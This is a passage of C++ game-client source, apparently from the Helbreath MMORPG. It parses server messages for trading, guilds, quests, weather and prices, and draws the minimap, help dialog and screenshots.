		if (pFile == NULL) return;
		fwrite(cp, strlen(cp), 1, pFile);
		fclose(pFile);
		m_stDialogBoxInfo[18].sX  =  20;
		m_stDialogBoxInfo[18].sY  =  65;
		EnableDialogBox(18, 1000, NULL, NULL);
		break;
	}
	AddEventList("Press F1 for help.", 10);
	if (m_iLevel < 42) EnableDialogBox(35, NULL, NULL, NULL);

}

int CGame::_iGetFOE(int iStatus)
{	BOOL bPK, bCitizen, bAresden, bHunter;
	if( m_iPKCount != 0 ) return -1;
	//	CLEROTH			0x00000000 status is int NOT short ( 3.51 )
	if( iStatus & 0x80000000 ) bPK = TRUE;
	else bPK = FALSE;
	if( iStatus & 0x40000000 ) bCitizen = TRUE;
	else bCitizen = FALSE;
	if( iStatus & 0x20000000 ) bAresden = TRUE;
	else bAresden = FALSE;
	if( iStatus & 0x10000000 ) bHunter = TRUE;
	else bHunter = FALSE;
	if( bPK == TRUE ) return -2;
	if( bCitizen == FALSE ) return 0;
	if( m_bCitizen == FALSE ) return 0;
	if( (m_bAresden == TRUE) && (bAresden == TRUE) ) return 1;
	if( (m_bAresden == FALSE) && (bAresden == FALSE) ) return 1;
	if( m_bIsCrusadeMode == TRUE  || m_bIsHeldenian) return -1;
	else
	{	if( (m_bHunter == FALSE) && (bHunter == FALSE) ) return -1;
		else return 0;
	}
}

void CGame::_SetIlusionEffect(int iOwnerH)
{
 char cDir;

	m_iIlusionOwnerH = iOwnerH;

	ZeroMemory(m_cName_IE, sizeof(m_cName_IE));
	m_pMapData->GetOwnerStatusByObjectID(iOwnerH, &m_cIlusionOwnerType, &cDir, &m_sAppr1_IE, &m_sAppr2_IE, &m_sAppr3_IE, &m_sAppr4_IE, &m_iStatus_IE, &m_iApprColor_IE, m_cName_IE);
}

void CGame::ResponsePanningHandler(char *pData)
{
 char * cp, cDir;
 short * sp, sX, sY;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE +2);

	sp = (short *)cp;
	sX = *sp;
	cp += 2;

	sp = (short *)cp;
	sY = *sp;
	cp += 2;

	cDir = *cp;
	cp++;

	switch (cDir) {
	case 1: m_sViewDstY -= 32; m_sPlayerY--; break;
	case 2: m_sViewDstY -= 32; m_sPlayerY--; m_sViewDstX += 32; m_sPlayerX++; break;
	case 3: m_sViewDstX += 32; m_sPlayerX++; break;
	case 4: m_sViewDstY += 32; m_sPlayerY++; m_sViewDstX += 32; m_sPlayerX++; break;
	case 5: m_sViewDstY += 32; m_sPlayerY++;break;
	case 6: m_sViewDstY += 32; m_sPlayerY++; m_sViewDstX -= 32; m_sPlayerX--; break;
	case 7: m_sViewDstX -= 32; m_sPlayerX--; break;
	case 8: m_sViewDstY -= 32; m_sPlayerY--; m_sViewDstX -= 32; m_sPlayerX--; break;
	}

	m_pMapData->ShiftMapData(cDir);
	_ReadMapData(sX, sY, cp);

	m_bIsRedrawPDBGS = TRUE;

	m_bIsObserverCommanded = FALSE;
}

BOOL CGame::bReadItemNameConfigFile()
{
 FILE * pFile;
 HANDLE hFile;
 DWORD  dwFileSize;
 char * cp, * token, cReadModeA, cReadModeB;
 char seps[] = "=\n";
 int iIndex;

	cReadModeA = 0;
	cReadModeB = 0;
	iIndex = 0;

	hFile = CreateFile("contents\\ItemName.cfg", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
	pFile = fopen("contents\\ItemName.cfg", "rt");
	if (pFile == NULL) return FALSE;
	else {
		cp = new char[dwFileSize+2];
		ZeroMemory(cp, dwFileSize+2);
		fread(cp, dwFileSize, 1, pFile);

		token = strtok( cp, seps );
		while( token != NULL )   {

			if (cReadModeA != 0) {
				switch (cReadModeA) {
				case 1:
					switch (cReadModeB) {
					case 1:
						m_pItemNameList[iIndex] = new class CItemName;
						strcpy(m_pItemNameList[iIndex]->m_cOriginName, token);
						cReadModeB = 2;
						break;

					case 2:
						strcpy(m_pItemNameList[iIndex]->m_cName, token);
						cReadModeA = 0;
						cReadModeB = 0;
						iIndex++;
						break;
					}
				}
			}
			else {
				if (memcmp(token, "Item", 4) == 0) {
					cReadModeA = 1;
					cReadModeB = 1;
				}
			}
			token = strtok( NULL, seps );
		}
		delete[] cp;
		fclose(pFile);
	}

	return TRUE;
}

void CGame::DrawDialogBox_Map()
{
 short sX, sY;
 DWORD dwTime = m_dwCurTime;
 double dV1, dV2, dV3;
 int    tX, tY, szX, szY, dX, dY;

	sX = m_stDialogBoxInfo[22].sX;
	sY = m_stDialogBoxInfo[22].sY;

	szX = 0;
	szY = 0;

	switch (m_stDialogBoxInfo[22].sV1) {
	case 1:
		switch (m_stDialogBoxInfo[22].sV2) {
		case 0: // aresden
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS1]->PutTransSprite2(sX, sY, 0, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS1]->PutSpriteFast(sX, sY, 0, dwTime);
			dX = 19;
			dY = 20;
			szX = 260;
			szY = 260;
			break;

		case 1: // elvine
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS1]->PutTransSprite2(sX, sY, 1, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS1]->PutSpriteFast(sX, sY, 1, dwTime);
			dX = 20;
			dY = 18;
			szX = 260;
			szY = 260;
			break;

		case 2: // middleland
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS2]->PutTransSprite2(sX, sY, 0, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS2]->PutSpriteFast(sX, sY, 0, dwTime);
			dX = 11;
			dY = 31;
			szX = 280;
			szY = 253;
			break;

		case 3: // default
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS2]->PutTransSprite2(sX, sY, 1, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS2]->PutSpriteFast(sX, sY, 1, dwTime);
			dX = 52;
			dY = 42;
			szX = 200;
			szY = 200;
			break;

		case 4: // aresden 
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS3]->PutTransSprite2(sX, sY, 0, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS3]->PutSpriteFast(sX, sY, 0, dwTime);
			dX = 40;
			dY = 40;
			szX = 220;
			szY = 220;
			break;

		case 5: // elvine 
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS3]->PutTransSprite2(sX, sY, 1, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS3]->PutSpriteFast(sX, sY, 1, dwTime);
			dX = 40;
			dY = 40;
			szX = 220;
			szY = 220;
			break;

		case 6: // aresden
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS4]->PutTransSprite2(sX, sY, 0, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS4]->PutSpriteFast(sX, sY, 0, dwTime);
			dX = 40;
			dY = 40;
			szX = 220;
			szY = 220;
			break;

		case 7: // elvine
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS4]->PutTransSprite2(sX, sY, 1, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS4]->PutSpriteFast(sX, sY, 1, dwTime);
			dX = 40;
			dY = 40;
			szX = 220;
			szY = 220;
			break;
		case 8: // aresden
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS5]->PutTransSprite2(sX, sY, 0, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS5]->PutSpriteFast(sX, sY, 0, dwTime);
			dX = 40;
			dY = 32;
			szX = 220;
			szY = 220;
			break;

		case 9: // elvine
			if (m_bDialogTrans)
				 m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS5]->PutTransSprite2(sX, sY, 1, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_NEWMAPS5]->PutSpriteFast(sX, sY, 1, dwTime);
			dX = 40;
			dY = 38;
			szX = 220;
			szY = 220;
			break;

		}

		dV1 = (double)m_pMapData->m_sMapSizeX;
		dV2 = (double)m_sPlayerX;
		dV3 = (dV2*(double)szX)/dV1;
		tX  = (int)dV3 +dX;

		dV1 = (double)m_pMapData->m_sMapSizeY;
		if( dV1 == 752 ) dV1 = 680;
		dV2 = (double)m_sPlayerY;
		dV3 = (dV2*(double)szY)/dV1;
		tY  = (int)dV3 +dY;

		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, sX +tX, sY +tY, 43);
		wsprintf(G_cTxt, "%d,%d", m_sPlayerX, m_sPlayerY);
		PutString_SprFont3(sX + 10 +tX -5, sY + 10 + tY -6, G_cTxt, m_wR[13]*4, m_wG[13]*4, m_wB[13]*4, FALSE, 2);
		break;
   	}
}
/*********************************************************************************************************************
**  void CGame::NotifyMsg_SetExchangeItem(char *pData)		(snoopy)												**
**  description			:: Recieve a msg from gserver and sets the item												**
**********************************************************************************************************************/
void CGame::NotifyMsg_SetExchangeItem(char *pData)
{short * sp, sDir, sSprite, sSpriteFrame, sCurLife, sMaxLife, sPerformance;
 int * ip, iAmount, i;
 char * cp, cColor, cItemName[24], cCharName[12];
 DWORD * dwp, dwAttribute;
	ZeroMemory(cItemName, sizeof(cItemName));
	ZeroMemory(cCharName, sizeof(cCharName));

	cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
	sp = (short *)cp;
	sDir = *sp;
	cp += 2;
	sp = (short *)cp;
	sSprite = *sp;
	cp += 2;
	sp = (short *)cp;
	sSpriteFrame = *sp;
	cp += 2;
	ip = (int *)cp;
	iAmount = *ip;
	cp += 4;
	cColor = *cp;
	cp++;
	sp = (short *)cp;
	sCurLife = *sp;
	cp += 2;
	sp = (short *)cp;
	sMaxLife = *sp;
	cp += 2;
	sp = (short *)cp;
	sPerformance = *sp;
	cp += 2;
	memcpy(cItemName, cp, 20);
	cp += 20;
	memcpy(cCharName, cp, 10);
	cp += 10;
	dwp = (DWORD *)cp;
	dwAttribute = *dwp;
	cp += 4;

#ifdef MULTI_TRADE
	if (sDir >= 1000)  // Set the item I want to exchange
	{
		i = 0;
		while (m_stDialogBoxExchangeInfo[i].sV1 != -1)
		{
			i++;
			if (i >= 8) return; // Error situation//50Cent - MultiTrade
		}
	}
	else // Set the item he proposes me.
	{
		i = 8;//50Cent - MultiTrade
		while (m_stDialogBoxExchangeInfo[i].sV1 != -1)
		{
			i++;
			if (i >= 16) return; // Error situation//50Cent - MultiTrade
		}
	}
#else
	if (sDir >= 1000)  // Set the item I want to exchange
	{	i = 0;
		while (m_stDialogBoxExchangeInfo[i].sV1 !=-1)
		{	i++;
			if (i>=4) return; // Error situation
		}
	}else // Set the item he proposes me.
	{	i = 4;
		while (m_stDialogBoxExchangeInfo[i].sV1 !=-1)
		{	i++;
			if (i>=8) return; // Error situation
	}	}
#endif
	m_stDialogBoxExchangeInfo[i].sV1 = sSprite;
	m_stDialogBoxExchangeInfo[i].sV2 = sSpriteFrame;
	m_stDialogBoxExchangeInfo[i].sV3 = iAmount;
	m_stDialogBoxExchangeInfo[i].sV4 = cColor;
	m_stDialogBoxExchangeInfo[i].sV5 = (int)sCurLife;
	m_stDialogBoxExchangeInfo[i].sV6 = (int)sMaxLife;
	m_stDialogBoxExchangeInfo[i].sV7 = (int)sPerformance;
	memcpy(m_stDialogBoxExchangeInfo[i].cStr1, cItemName, 20);
	memcpy(m_stDialogBoxExchangeInfo[i].cStr2, cCharName, 10);
	m_stDialogBoxExchangeInfo[i].dwV1 = dwAttribute;
}

void CGame::NotifyMsg_DismissGuildApprove(char * pData)
{
 char * cp, cName[24], cLocation[12];
	ZeroMemory(cName, sizeof(cName));
	ZeroMemory(cLocation, sizeof(cLocation));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 20);
	cp += 20;
	cp += 2;
	memcpy(cLocation, cp, 10);
	cp += 10;
	ZeroMemory(m_cGuildName, sizeof(m_cGuildName));
	m_iGuildRank = -1;
	ZeroMemory(m_cLocation, sizeof(m_cLocation));
	memcpy(m_cLocation, cLocation, 10);
	if (memcmp(m_cLocation, "aresden", 7) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "arehunter", 9) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else if (memcmp(m_cLocation, "elvine", 6) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "elvhunter", 9) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else
	{	m_bAresden = TRUE;
		m_bCitizen = FALSE;
		m_bHunter  = TRUE;
	}
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 5);
}

void CGame::NotifyMsg_DismissGuildReject(char * pData)
{char * cp, cName[21];
	ZeroMemory(cName, sizeof(cName));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 20);
	cp += 20;
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 6);
}

void CGame::NotifyMsg_DownSkillIndexSet(char *pData)
{
 WORD * wp;
 short sSkillIndex;
 char * cp;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	wp = (WORD *)cp;
	sSkillIndex = (short)*wp;
	cp += 2;
	m_iDownSkillIndex = sSkillIndex;
	m_stDialogBoxInfo[15].bFlag = FALSE;
}

void CGame::NotifyMsg_FishChance(char * pData)
{
 int iFishChance;
 char * cp;
 WORD * wp;
	cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
	wp = (WORD *)cp;
	iFishChance = (int)*wp;
	cp += 2;
	m_stDialogBoxInfo[24].sV1 = iFishChance;
}

void CGame::NotifyMsg_GuildDisbanded(char * pData)
{char * cp, cName[24], cLocation[12];
	ZeroMemory(cName, sizeof(cName));
	ZeroMemory(cLocation, sizeof(cLocation));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 20);
	cp += 20;
	memcpy(cLocation, cp, 10);
	cp += 10;
	m_Misc.ReplaceString(cName, '_', ' ');
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 7);
	ZeroMemory(m_cGuildName, sizeof(m_cGuildName));
	m_iGuildRank = -1;
	ZeroMemory(m_cLocation, sizeof(m_cLocation));
	memcpy(m_cLocation, cLocation, 10);
	if (memcmp(m_cLocation, "aresden", 7) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "arehunter", 9) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else if (memcmp(m_cLocation, "elvine", 6) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "elvhunter", 9) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else
	{	m_bAresden = TRUE;
		m_bCitizen = FALSE;
		m_bHunter  = TRUE;
	}
}

void CGame::NotifyMsg_WhetherChange(char * pData)
{
 char * cp;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	m_cWhetherStatus = *cp;
	cp++;

	if (m_cWhetherStatus != NULL)
		 SetWhetherStatus(TRUE,  m_cWhetherStatus);
	else SetWhetherStatus(FALSE, NULL);
}

void CGame::NotifyMsg_TimeChange(char * pData)
{ char * cp;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	G_cSpriteAlphaDegree = *cp;
	switch (G_cSpriteAlphaDegree) {
	case 1:	m_bIsXmas = FALSE; PlaySound('E', 32, 0); break;
	case 2: m_bIsXmas = FALSE; PlaySound('E', 31, 0); break;
	case 3: // Snoopy Special night with chrismas bulbs
		if (m_cWhetherEffectType >3) m_bIsXmas = TRUE;
		else m_bIsXmas = FALSE;
		PlaySound('E', 31, 0);
		G_cSpriteAlphaDegree = 2;break;
	}
	m_cGameModeCount = 1;
	m_bIsRedrawPDBGS = TRUE;
}

void CGame::NotifyMsg_RepairItemPrice(char * pData)
{char * cp, cName[21];
 DWORD * dwp, wV1, wV2, wV3, wV4;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	dwp = (DWORD *)cp;
  	wV1 = *dwp;
	cp += 4;
	dwp = (DWORD *)cp;
  	wV2 = *dwp;
	cp += 4;
	dwp = (DWORD *)cp;
  	wV3 = *dwp;
	cp += 4;
	dwp = (DWORD *)cp;
  	wV4 = *dwp;
	cp += 4;
	ZeroMemory(cName, sizeof(cName));
	memcpy(cName, cp, 20);
	cp += 20;
	EnableDialogBox(23, 2, wV1, wV2);
	m_stDialogBoxInfo[23].sV3 = wV3;
}

void CGame::NotifyMsg_SellItemPrice(char * pData)
{char * cp, cName[21];
 DWORD * dwp, wV1, wV2, wV3, wV4;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	dwp = (DWORD *)cp;
  	wV1 = *dwp;
	cp += 4;
	dwp = (DWORD *)cp;
  	wV2 = *dwp;
	cp += 4;
	dwp = (DWORD *)cp;
  	wV3 = *dwp;
	cp += 4;
	dwp = (DWORD *)cp;
  	wV4 = *dwp;
	cp += 4;
	ZeroMemory(cName, sizeof(cName));
	memcpy(cName, cp, 20);
	cp += 20;
	EnableDialogBox(23, 1, wV1, wV2);
	m_stDialogBoxInfo[23].sV3 = wV3;
	m_stDialogBoxInfo[23].sV4 = wV4;
}

void CGame::NotifyMsg_QueryDismissGuildPermission(char * pData)
{char * cp, cName[12];
	ZeroMemory(cName, sizeof(cName));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 10);
	cp += 10;
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 2);
}


void CGame::NotifyMsg_QueryJoinGuildPermission(char * pData)
{char * cp, cName[12];
	ZeroMemory(cName, sizeof(cName));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 10);
	cp += 10;
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 1);
}


void CGame::NotifyMsg_QuestContents(char *pData)
{short * sp;
 char  * cp;
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	sp = (short *)cp;
	m_stQuest.sWho = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sQuestType = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sContribution = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sTargetType = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sTargetCount = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sX = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sY = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.sRange = *sp;
	cp += 2;
	sp = (short *)cp;
	m_stQuest.bIsQuestCompleted = (BOOL)*sp;
	cp += 2;
	ZeroMemory(m_stQuest.cTargetName, sizeof(m_stQuest.cTargetName));
	memcpy(m_stQuest.cTargetName, cp, 20);
	cp += 20;
}

void CGame::NotifyMsg_PlayerProfile(char * pData)
{char * cp;
 char cTemp[500];
 int i;
	ZeroMemory(cTemp, sizeof(cTemp));
	cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
	strcpy(cTemp, cp);
	for (i = 0; i < 500; i++)
	if (cTemp[i] == '_') cTemp[i] = ' ';
	AddEventList(cTemp, 10);
}

void CGame::NotifyMsg_NoticeMsg(char * pData)
{char * cp, cMsg[1000];
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	strcpy(cMsg, cp);
	AddEventList(cMsg, 10);
}
/*********************************************************************************************************************
**  void CGame::NotifyMsg_OpenExchageWindow(char *pData)		(snoopy)											**
**  description			:: Recieve a msg from gserver and sets the item	and opens trade windows						**
**********************************************************************************************************************/
void CGame::NotifyMsg_OpenExchageWindow(char *pData)
{short * sp, sDir, sSprite, sSpriteFrame, sCurLife, sMaxLife, sPerformance;
 int * ip, iAmount;
 char * cp, cColor, cItemName[24], cCharName[12];
 DWORD * dwp, dwAttribute;
	ZeroMemory(cItemName, sizeof(cItemName));
	ZeroMemory(cCharName, sizeof(cCharName));

	cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
	sp = (short *)cp;
	sDir = *sp;
	cp += 2;
	sp = (short *)cp;
	sSprite = *sp;
	cp += 2;
	sp = (short *)cp;
	sSpriteFrame = *sp;
	cp += 2;
	ip = (int *)cp;
	iAmount = *ip;
	cp += 4;
	cColor = *cp;
	cp++;
	sp = (short *)cp;
	sCurLife = *sp;
	cp += 2;
	sp = (short *)cp;
	sMaxLife = *sp;
	cp += 2;
	sp = (short *)cp;
	sPerformance = *sp;
	cp += 2;
	memcpy(cItemName, cp, 20);
	cp += 20;
	memcpy(cCharName, cp, 10);
	cp += 10;
	dwp = (DWORD *)cp;
	dwAttribute = *dwp;
	cp += 4;

	EnableDialogBox(27, 1, 0, 0, NULL);
	int i;
#ifdef MULTI_TRADE
	if (sDir >= 1000)  // Set the item I want to exchange
	{
		i = 0;
		while (m_stDialogBoxExchangeInfo[i].sV1 != -1)
		{
			i++;
			if (i >= 8) return; // Error situation//50Cent - MultiTrade 
		}
		if ((sDir > 1000) && (i == 0))
		{
			m_bIsItemDisabled[sDir - 1000] = TRUE;
			m_stDialogBoxExchangeInfo[0].sItemID = sDir - 1000;
		}
	}
	else // Set the item he proposes me.
	{
		i = 8;//50Cent - MultiTrade
		while (m_stDialogBoxExchangeInfo[i].sV1 != -1)
		{
			i++;
			if (i >= 16) return; // Error situation//50Cent - MultiTrade
		}
	}
#else
	if (sDir >= 1000)  // Set the item I want to exchange
	{	i = 0;
		while (m_stDialogBoxExchangeInfo[i].sV1 !=-1)
		{	i++;
			if (i>=4) return; // Error situation
		}
		if ((sDir >1000) && (i == 0))
		{	m_bIsItemDisabled[sDir -1000] = TRUE;
			m_stDialogBoxExchangeInfo[0].sItemID = sDir -1000;
		}
	}else // Set the item he proposes me.
	{	i = 4;
		while (m_stDialogBoxExchangeInfo[i].sV1 !=-1)
		{	i++;
			if (i>=8) return; // Error situation
	}	}
#endif
	m_stDialogBoxExchangeInfo[i].sV1 = sSprite;
	m_stDialogBoxExchangeInfo[i].sV2 = sSpriteFrame;
	m_stDialogBoxExchangeInfo[i].sV3 = iAmount;
	m_stDialogBoxExchangeInfo[i].sV4 = cColor;
	m_stDialogBoxExchangeInfo[i].sV5 = (int)sCurLife;
	m_stDialogBoxExchangeInfo[i].sV6 = (int)sMaxLife;
	m_stDialogBoxExchangeInfo[i].sV7 = (int)sPerformance;
	memcpy(m_stDialogBoxExchangeInfo[i].cStr1, cItemName, 20);
	memcpy(m_stDialogBoxExchangeInfo[i].cStr2, cCharName, 10);
	m_stDialogBoxExchangeInfo[i].dwV1 = dwAttribute;
}

void CGame::NotifyMsg_JoinGuildApprove(char * pData)
{char * cp, cName[21];
 short * sp;
	ZeroMemory(cName, sizeof(cName));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 20);
	cp += 20;
	sp = (short *)cp;
	cp += 2;
	ZeroMemory(m_cGuildName, sizeof(m_cGuildName));
	strcpy(m_cGuildName, cName);
	m_iGuildRank = *sp;
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 3);
}


void CGame::NotifyMsg_JoinGuildReject(char * pData)
{char * cp, cName[21];
	ZeroMemory(cName, sizeof(cName));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 20);
	cp += 20;
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 4);
}

void CGame::DlgBoxClick_Help(int msX, int msY)
{ short sX, sY;
	sX = m_stDialogBoxInfo[35].sX;
	sY = m_stDialogBoxInfo[35].sY;

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*0) && (msY < sY +50+15*1)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 900, NULL, NULL);
	}
	
	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*1) && (msY < sY +50+15*2)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 1000, NULL, NULL);
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*2) && (msY < sY +50+15*3)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 901, NULL, NULL);
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*3) && (msY < sY +50+15*4)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 902, NULL, NULL);
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*4) && (msY < sY +50+15*5)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 903, NULL, NULL);
		m_bIsF1HelpWindowEnabled = TRUE;
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*5) && (msY < sY +50+15*6)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 904, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*6) && (msY < sY +50+15*7)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 905, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*7) && (msY < sY +50+15*8)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 906, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*8) && (msY < sY +50+15*9)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 907, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*9) && (msY < sY +50+15*10)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 908, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*10) && (msY < sY +50+15*11)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 909, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*11) && (msY < sY +50+15*12)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 910, NULL, NULL); //
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*12) && (msY < sY +50+15*13)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 911, NULL, NULL); // FAQ
	}

	if ((msX >= sX+25) && (msX <= sX+248) && (msY >= sY +50+15*13) && (msY < sY +50+15*14)) {
		DisableDialogBox(18);
		EnableDialogBox(18, 912, NULL, NULL); //
	}
	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		PlaySound('E', 14, 5);
		DisableDialogBox(35);
	}
}

/*********************************************************************************************************************
** void CGame::CreateScreenShot()										(snoopy)									**
**  description			:: Fixed Screen Shots																		**
**********************************************************************************************************************/
void CGame::CreateScreenShot()
{	//HelShot20060307_173003_Warehouse000.jpg
 int i;
 FILE * pFile;
 char cFn[256];
 char LongMapName[128];
 char SStime[32];
 SYSTEMTIME SysTime;
	GetLocalTime(&SysTime);
	ZeroMemory(LongMapName, sizeof(LongMapName));
	GetOfficialMapName(m_cMapName, LongMapName);
	ZeroMemory(SStime, sizeof(SStime));
	wsprintf(SStime, "%02d/%02d/%04d - %02d:%02d:%02d"
		, SysTime.wDay, SysTime.wMonth, SysTime.wYear
		, SysTime.wHour, SysTime.wMinute, SysTime.wSecond);
	PutAlignedString(500, 650, 15, SStime, 255, 255, 255); //ScreenShot time
	for (i = 0; i < 1000; i++)
	{	ZeroMemory(cFn, sizeof(cFn));
		wsprintf(cFn, "SAVE\\HelShot%04d%02d%02d_%02d%02d%02d_%s%03d.jpg"
			, SysTime.wYear, SysTime.wMonth, SysTime.wDay
			, SysTime.wHour, SysTime.wMinute, SysTime.wSecond
			, LongMapName
			,i);
		_mkdir("SAVE");
		pFile = fopen(cFn, "rb");
		if (pFile == NULL)
		{	m_DDraw.Screenshot(cFn, m_DDraw.m_lpBackB4);
			CxImage  image;
			image.Load(cFn, CXIMAGE_FORMAT_BMP);
			if (image.IsValid())
			{   image.SetJpegQuality(80);
			    image.Save(cFn,CXIMAGE_FORMAT_JPG);
			}
			wsprintf(G_cTxt, NOTIFYMSG_CREATE_SCREENSHOT1, cFn);
			AddEventList(G_cTxt, 10);
			return;
		}
		fclose(pFile);
	}
	AddEventList(NOTIFYMSG_CREATE_SCREENSHOT2, 10);
}

void CGame::UpdateScreen_OnConnecting()
{
 short sX, sY, msX, msY, msZ;
 char cLB, cRB;
 DWORD dwTime = timeGetTime();
 static class CMouseInterface * pMI;
 static DWORD dwMTime, dwCTime;

	if (m_cGameModeCount == 0) {
		m_bEnterPressed = FALSE;
		m_bEscPressed   = FALSE;
		dwCTime = dwMTime = timeGetTime();
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_bEscPressed == TRUE) {

		if ((dwTime - m_dwTime) > 1000)
